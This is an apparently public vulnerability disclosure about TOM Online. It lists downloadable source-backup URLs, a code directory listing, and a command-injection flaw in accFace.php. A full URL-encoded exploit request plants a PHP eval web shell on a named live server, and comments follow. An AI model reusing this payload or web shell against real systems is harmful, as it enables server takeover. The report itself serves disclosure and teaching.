2013-12-23: 细节已通知厂商并且等待厂商处理中 2013-12-24: 厂商已经确认,细节仅向厂商公开 2014-01-03: 细节向核心白帽子及相关领域专家公开 2014-01-13: 细节向普通白帽子公开 2014-01-23: 细节向实习白帽子公开 2014-02-06: 细节向公众公开
对Tom在线的运维缺陷加以利用直接导致命令执行
@xsser 刚才发的那个TOM任意文件上传,我知道是已经提交过的,但厂商没有修复,麻烦再通知下厂商,谢谢.对这个漏洞我真不想说什么了,运维的、写代码真的应该好好给他们洗洗脑...#1 好多个网站的源代码任意下载
http://post.news.tom.com/post.tar.gzhttp://post.tom.com/post.tar.gzhttp://post.weiqi.tom.com/post.tar.gzhttp://post.auto.tom.com/post.tar.gzhttp://post.she.tom.com/post.tar.gz
应该还没列完,好好检查下。#2 解压post.tar.gz
C:\Users\Administrator\Desktop\code 的目录2013/12/23 17:07 <DIR> .2013/12/23 17:07 <DIR> ..2013/12/23 16:02 <DIR> .svn2013/12/23 16:02 <DIR> ajax2013/12/23 16:02 <DIR> cache2013/12/23 16:03 <DIR> channel2013/12/23 16:02 <DIR> class2013/12/23 16:02 <DIR> cmslog2013/12/23 16:02 <DIR> cmslog22013/12/23 16:02 <DIR> cmslog32013/12/23 16:02 <DIR> config2013/12/23 16:02 <DIR> cron2013/12/23 16:02 <DIR> dyp2013/12/23 16:03 <DIR> functions2013/12/23 16:02 <DIR> help2013/12/23 16:03 <DIR> images2013/12/23 16:03 <DIR> img_tmp2013/12/23 16:03 <DIR> include2013/12/23 16:02 <DIR> index2013/12/23 16:02 <DIR> infchannel2013/12/23 16:03 <DIR> interface2013/12/23 16:02 <DIR> lib2013/12/23 16:02 <DIR> log2013/12/23 16:02 <DIR> post2013/12/23 16:02 <DIR> qa2013/12/23 16:02 <DIR> related_news_cache2013/12/23 16:03 <DIR> script2013/12/23 16:02 <DIR> shell2013/12/23 16:02 <DIR> style2013/12/23 16:02 <DIR> template2013/12/23 16:02 <DIR> test2013/12/23 16:03 <DIR> testjs2013/12/23 16:02 <DIR> tmp2013/12/23 16:03 <DIR> userface2011/08/01 15:56 12,288 .鏂板崕缃_0110614-20110615_.txt.swp2009/03/25 17:17 79,215 4A000A95112.html2011/06/24 13:36 15,583 778DV6L3.html2010/08/04 14:28 0 a.txt2009/03/25 17:16 623 aa.html2009/03/25 17:16 280 aa.php2013/12/23 17:09 2,145 accFace.php2009/03/25 17:16 52,383 ag.php2011/06/24 17:44 71,786 article_gallery_special.php2011/07/12 13:22 71,085 article_gallery_special2011bai.php2010/04/22 18:13 65,989 article_gallery_special_t.php2010/09/16 10:59 69,760 article_gallery_v2.php2009/03/25 17:17 57,872 article_gallery_v2_t.php2011/06/25 11:09 73,872 article_special.php2011/01/05 16:51 72,558 article_special2.php2011/07/27 14:56 73,943 article_special20110726.php2011/07/21 18:52 75,839 article_special2011bai.php2011/07/21 18:21 75,839 article_special2011bai1.php2011/01/28 11:07 73,794 article_special3.php2011/06/24 14:19 74,136 article_special4.php2009/08/14 11:09 73,268 article_special_test.php2009/03/25 17:17 57,659 article_t.php2009/03/25 17:17 85,644 article_v3.html2009/03/25 17:17 56,547 article_v3_20090120_wd_bak.php2010/09/17 17:03 70,262 article_v5.php2009/09/28 14:30 66,067 article_v5_t.php2010/07/27 13:00 89 asx.php2011/03/02 17:26 867 auto_delete_nandu.php2011/02/25 17:33 134 auto_delete_nandu.sh2010/06/29 10:24 0 b2009/08/20 17:00 1,553 batchcomment.php2009/03/25 17:17 4,169 bot.php2009/03/25 17:16 3,046 cn.php2009/08/10 09:13 30,870 comment.php2009/03/25 17:16 10,297 common.functions.php2010/06/03 15:32 11,191 del.txt2010/08/03 11:19 27,222 delete2011/08/30 15:47 2,299,080 deleteSucc.log2011/02/24 17:34 38 deletetmp.txt2009/03/25 17:16 3,737 doCatalog.php2009/03/25 17:17 1,364 doDeleteArticle.php2009/03/25 17:16 999 doLogin.test.php2009/03/25 17:16 1,421 doRegister.php2009/03/25 17:17 3,938 doUpdateUser.php2009/09/03 12:08 3,665 doUploadArticleImg.php2010/04/22 11:01 3,636 doUploadImage.php2009/09/03 13:11 3,740 duai.php2010/06/07 15:18 19 env.php2009/03/25 17:16 1,150 favicon.ico2011/08/04 09:56 752 fazhi20110804.txt2009/03/25 17:17 1,477 foreign.php2009/03/25 17:16 22,414 g.php2009/08/18 11:26 18,654 gallery.php2009/07/06 17:29 24,891 gallery_bak.php2009/07/09 14:21 18,660 gallery_t.php2010/03/30 10:11 271 gettangyuan.php2009/11/20 17:08 2,806 HanroadClass.php2009/07/08 15:54 1,435 hwbang.php2009/03/25 17:16 584 hwrec.php2009/07/08 15:54 1,487 hwtag.php2009/03/25 17:17 1,111 hyperwords.php2009/07/24 17:57 2,362 index.html2011/08/30 13:00 13,037 index.php2009/03/25 17:17 12,757 index1.html2009/03/25 17:16 311 indexStat.php2009/07/06 18:46 61,822 index_voice.php2009/07/06 18:23 61,494 index_voice_bak.php2009/03/25 17:16 25 ip.php2010/07/07 15:28 1,245 j2010/07/07 15:30 10,588 j12010/07/07 15:25 36,553 jhsblynew2010/07/07 15:25 8,172 jhsbzwnew2009/03/25 17:17 730 link.php2009/06/01 20:27 523 log.php2009/07/24 17:53 2,926 login.php2009/03/25 17:17 693 logout.php2010/11/03 16:52 3,114 main.inc.php2009/03/25 17:16 1,807 manageArticle.php2009/03/25 17:16 1,059 manageArticleByCatalog.php2009/03/25 17:17 667 manageCatalog.php2009/03/25 17:17 630 manageUser.php2009/03/25 17:17 597 modify_list2009/03/25 17:17 428 msg.html2011/02/24 18:19 24,599 nandu_end.txt2011/02/28 15:47 191 nandu_end2011-02-28.txt2011/03/30 15:47 152 nandu_end2011-03-30.txt2011/03/31 15:47 152 nandu_end2011-03-31.txt2011/04/30 15:47 86 nandu_end2011-04-30.txt2011/05/30 15:47 154 nandu_end2011-05-30.txt2011/05/31 15:47 154 nandu_end2011-05-31.txt2011/06/01 15:47 0 nandu_end2011-06-01.txt2011/06/02 15:47 13 nandu_end2011-06-02.txt2011/06/03 15:47 13 nandu_end2011-06-03.txt2011/06/04 15:47 13 nandu_end2011-06-04.txt2011/06/05 15:47 13 nandu_end2011-06-05.txt2011/06/06 15:47 13 nandu_end2011-06-06.txt2011/06/07 15:47 13 nandu_end2011-06-07.txt2011/06/08 15:47 13 nandu_end2011-06-08.txt2011/06/09 15:47 13 nandu_end2011-06-09.txt2011/06/10 15:47 26 nandu_end2011-06-10.txt2011/06/11 15:47 26 nandu_end2011-06-11.txt2011/06/12 15:47 26 nandu_end2011-06-12.txt2011/06/13 15:47 39 nandu_end2011-06-13.txt2011/06/14 15:47 39 nandu_end2011-06-14.txt2011/06/15 15:47 52 nandu_end2011-06-15.txt2011/06/16 15:47 65 nandu_end2011-06-16.txt2011/06/17 15:47 78 nandu_end2011-06-17.txt2011/06/18 15:47 78 nandu_end2011-06-18.txt2011/06/19 15:47 78 nandu_end2011-06-19.txt2011/06/20 15:47 91 nandu_end2011-06-20.txt2011/06/21 15:47 91 nandu_end2011-06-21.txt2011/06/22 15:47 91 nandu_end2011-06-22.txt2011/06/23 15:47 91 nandu_end2011-06-23.txt2011/06/24 15:47 91 nandu_end2011-06-24.txt2011/06/25 15:47 91 nandu_end2011-06-25.txt2011/06/26 15:47 91 nandu_end2011-06-26.txt2011/06/27 15:47 116 nandu_end2011-06-27.txt2011/06/28 15:47 116 nandu_end2011-06-28.txt2011/06/29 15:47 116 nandu_end2011-06-29.txt2011/06/30 15:47 116 nandu_end2011-06-30.txt2011/07/01 15:47 13 nandu_end2011-07-01.txt2011/07/02 15:47 26 nandu_end2011-07-02.txt2011/07/03 15:47 26 nandu_end2011-07-03.txt2011/07/04 15:47 50 nandu_end2011-07-04.txt2011/07/05 15:47 50 nandu_end2011-07-05.txt2011/07/06 15:47 86 nandu_end2011-07-06.txt2011/07/07 15:47 86 nandu_end2011-07-07.txt2011/07/08 15:47 110 nandu_end2011-07-08.txt2011/07/09 15:47 110 nandu_end2011-07-09.txt2011/07/10 15:47 110 nandu_end2011-07-10.txt2011/07/11 15:47 110 nandu_end2011-07-11.txt2011/07/12 15:47 110 nandu_end2011-07-12.txt2011/07/13 15:47 110 nandu_end2011-07-13.txt2011/07/14 15:47 110 nandu_end2011-07-14.txt2011/07/15 15:47 110 nandu_end2011-07-15.txt2011/07/16 15:47 110 nandu_end2011-07-16.txt2011/07/17 15:47 110 nandu_end2011-07-17.txt2011/07/18 15:47 110 nandu_end2011-07-18.txt2011/07/19 15:47 110 nandu_end2011-07-19.txt2011/07/20 15:47 110 nandu_end2011-07-20.txt2011/07/21 15:47 110 nandu_end2011-07-21.txt2011/07/22 15:47 110 nandu_end2011-07-22.txt2011/07/23 15:47 110 nandu_end2011-07-23.txt2011/07/24 15:47 110 nandu_end2011-07-24.txt2011/07/25 15:47 110 nandu_end2011-07-25.txt2011/07/26 15:47 121 nandu_end2011-07-26.txt2011/07/27 15:47 146 nandu_end2011-07-27.txt2011/07/28 15:47 159 nandu_end2011-07-28.txt2011/07/29 15:47 159 nandu_end2011-07-29.txt2011/07/30 15:47 159 nandu_end2011-07-30.txt2011/07/31 15:47 159 nandu_end2011-07-31.txt2011/08/01 15:47 0 nandu_end2011-08-01.txt2011/08/02 15:47 0 nandu_end2011-08-02.txt2011/08/03 15:47 0 nandu_end2011-08-03.txt2011/08/04 15:47 0 nandu_end2011-08-04.txt2011/08/05 15:47 0 nandu_end2011-08-05.txt2011/08/06 15:47 0 nandu_end2011-08-06.txt2011/08/07 15:47 0 nandu_end2011-08-07.txt2011/08/08 15:47 0 nandu_end2011-08-08.txt2011/08/09 15:47 12 nandu_end2011-08-09.txt2011/08/10 15:47 12 nandu_end2011-08-10.txt2011/08/11 15:47 12 nandu_end2011-08-11.txt2011/08/12 15:47 12 nandu_end2011-08-12.txt2011/08/13 15:47 12 nandu_end2011-08-13.txt2011/08/14 15:47 12 nandu_end2011-08-14.txt2011/08/15 15:47 12 nandu_end2011-08-15.txt2011/08/16 15:47 12 nandu_end2011-08-16.txt2011/08/17 15:47 25 nandu_end2011-08-17.txt2011/08/18 15:47 25 nandu_end2011-08-18.txt2011/08/19 15:47 25 nandu_end2011-08-19.txt2011/08/20 15:47 25 nandu_end2011-08-20.txt2011/08/21 15:47 25 nandu_end2011-08-21.txt2011/08/22 15:47 25 nandu_end2011-08-22.txt2011/08/23 15:47 38 nandu_end2011-08-23.txt2011/08/24 15:47 38 nandu_end2011-08-24.txt2011/08/25 15:47 50 nandu_end2011-08-25.txt2011/08/26 15:47 63 nandu_end2011-08-26.txt2011/08/27 15:47 63 nandu_end2011-08-27.txt2011/08/28 15:47 63 nandu_end2011-08-28.txt2011/08/29 15:47 63 nandu_end2011-08-29.txt2011/08/30 15:47 63 nandu_end2011-08-30.txt2011/01/19 16:49 8,336 nandu_new.txt2011/02/25 16:37 24 nandu_new1.txt2011/02/24 18:10 26,631 nandu_trans.txt2010/06/28 14:53 611 ndylzkbak2010/06/28 14:53 579 ndzkbak2009/04/08 18:18 201 new2009/04/02 15:42 850 new.php2009/03/25 17:16 46,029 newsearch.php2009/09/04 10:20 1,272 NewsEdit.html2009/03/25 17:17 46,415 ourgame.php2009/06/16 15:39 64,022 ourgame_gallery.php2009/06/15 13:15 66,174 ourgame_v2.php2009/05/31 10:54 18,343 out.txt2009/03/25 17:16 3,186 pass_indexlogin.js2009/03/25 17:17 4,262 pdnav.js2009/03/25 17:17 614 pfprt.php2009/03/25 17:17 31,233 pn.php2009/07/09 17:33 3,891 PostCollector.php2009/08/01 17:28 6,284 PPCache.php2009/11/03 16:56 28,937 publish_news.php2010/06/07 16:11 29,522 publish_news_t.php2009/04/08 16:54 34,624 publish_news_v2.php2011/04/06 17:49 180,587 qingnianbao_res.txt2011/04/08 08:56 59,768 qingnianbao_res1.txt2009/03/25 17:16 2,169 redirect.php2009/03/25 17:17 2,174 redirect8.php2009/03/25 17:16 2,209 redirect8_test.php2009/03/25 17:17 813 register.php2010/05/28 19:48 3,131 renming2009/03/25 17:16 21,551 scriptt2009/03/25 17:17 673 search.php2009/03/25 17:17 685 searchUtf8.php2011/05/12 10:08 577 Search_agent.html2009/03/25 17:16 54 sitemap.html2009/03/25 17:16 138,275 sk.html2009/03/25 17:16 304,774 sk.js2009/03/25 17:17 304,799 sk1.js2011/01/28 12:06 1,510 snooker_weibo.html2009/03/25 17:16 77,809 sport_vote_1.html2009/03/25 17:17 1,181 status.php2009/03/25 17:17 91,784 t.html2009/04/13 13:17 65,423 t.php2009/08/26 15:38 209 t0.php2009/04/15 14:15 2,604 t1.php2009/03/25 17:17 842 t2.php2009/08/28 15:52 6,275 tag.php2009/08/28 15:51 6,088 tag1.php2009/08/28 15:47 6,147 tag20080320.php2009/03/25 17:17 4,187 tag_list_comments.php2009/03/25 17:16 4,488 tag_list_digs.php2009/03/25 17:16 4,212 tag_list_tramples.php2009/03/25 17:17 109,674 test.html2011/08/04 10:08 455 test.php2010/05/28 20:02 2,747 test.txt2011/07/18 17:47 147 test2.php2010/06/03 15:40 2,917 test2.txt2009/03/25 17:17 388 test_article_list.php2011/06/28 10:24 373 test_cao.php2009/08/04 18:00 4,848 test_cms.html2009/03/25 17:16 4,078 top.php2009/03/25 17:17 4,053 top1h.php2009/06/29 10:24 6,853 TPPClient.php2009/04/09 16:29 159 trip.php2009/03/25 17:16 832 tt.html2009/04/10 11:39 1,169 tt.php2009/03/25 17:16 2,771 uai.php2009/09/03 11:55 2,683 uai_t.php2009/09/08 10:58 932 update.php2009/08/28 10:48 1,335 updatesmall.php2009/09/03 13:25 2,476 uploadArticleImg.php2009/09/22 09:45 4,832 user.php2009/11/03 14:42 4,509 userInfo.php2009/03/25 17:16 757 vimrc2010/10/15 14:20 39 wcf2010/10/13 10:41 477 wcf.php2010/10/15 14:21 39 wcfanother2010/10/15 14:22 39 wcfanother112010/10/15 14:20 39 wcfdefault2009/03/25 17:16 57,881 weekend.php2009/03/25 17:16 1,002 weekend_x.php2011/06/15 11:27 81 xinhua20110614-20110615.txt2011/06/15 11:20 84 xinhua20110614-20110615_.txt2011/06/28 10:22 2,883 xinhua20110616-0628_new.txt2011/06/28 15:48 2,663 xinhua20110616-0628_new_res.txt2011/06/28 09:54 5,594 xinhua20110616.txt2011/06/28 10:00 16,073 xinhua20110616_res.txt2010/08/03 20:02 307 zgxwzk2011/07/08 14:49 73,872 拷贝于 article_special.php2011/06/15 11:20 84 鏂板崕缃_0110614-20110615_.txt
#3 对下载的代码进行简单审计根目录下的accFace.php文件
<?php//...$faceName = urldecode(trim($_GET['faceName']));$tmpPath = urldecode(trim($_GET['tmpPath']));if (get_magic_quotes_gpc()) { $faceName = stripslashes($faceName); $tmpPath = stripslashes($tmpPath); $localPath = stripslashes($localPath);}$subPath = $FACE_LOCAL_PATH.preg_replace('/\\/[^\\/]+?\\w$/i', '', $faceName);if (!file_exists($subPath)) { @exec("mkdir -p $subPath");}$commandDesc = "wget -O $FACE_LOCAL_PATH$faceName $tmpPath$faceName";exec($commandDesc);//生成缩略图resizeImage($FACE_LOCAL_PATH.$faceName, $FACE_LOCAL_PATH.str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);?>
65-67行:
if (!file_exists($subPath)) { @exec("mkdir -p $subPath");//一看就知道是C程序员写的, exec啊,其实吧,php有相应函数的....}
$subPath没过滤,导致任意命令执行...#4 利用吧直接访问accFace.php爆出绝对路径,好吧 那我们就写个shell进去...
我们构造faceName参数为:
aa || echo '<?php eval($_POST[#]);?>It works' >/data/webroot/post/tom.php
Encode 下:
aa%20%7C%7C%20echo%20'<%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F>It%20works'%20>%2Fdata%2Fwebroot%2Fpost%2Ftom.php
GET提交:
http://post.news.tom.com/accFace.php?faceName=aa%20%7C%7C%20echo%20'%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F%3EIt%20works'%20%3E%2Fdata%2Fwebroot%2Fpost%2Ftom.php&tmpPath=1&localPath=1
命令执行了,在根目录下生产tom.php
#5 shell show
备份文件删或改,代码好好检查下.哈哈 帮你们找到个那么严重的漏洞,有礼物否...
危害等级:高
漏洞Rank:13
确认时间:2013-12-24 10:58
非常感谢您对TOM在线的帮助,我们会尽快做出处理。我们为支持TOM在线的发布者创建了一个技术交流QQ群:328442670,希望您以及更多的成员加入,大家共同交流。同时TOM在线在通过公司申请后会不定期发送礼品给发布者,以表您对TOM在线的支持。
暂无
闪电闪电闪电!
来膜拜一下
肯定是利用的方式是创新的
闪电呀!!
啪!
@TOM在线 才给13rank,看来你们对安全的理解确实不怎么的啊.
TOM在线的评分好像是挺随意的
呵呵呵,终于被爆出来了
mark
@Mr.leo 分低了点看不到细节。。。
@HackBraid 换大号哈
@HackBraid 看到细节了,可以问我
果然是源码分析的 呵呵呵呵 , 搞源码备份的太该死了。
不错!挺详细的!很好的教学呀!
很详细 学习了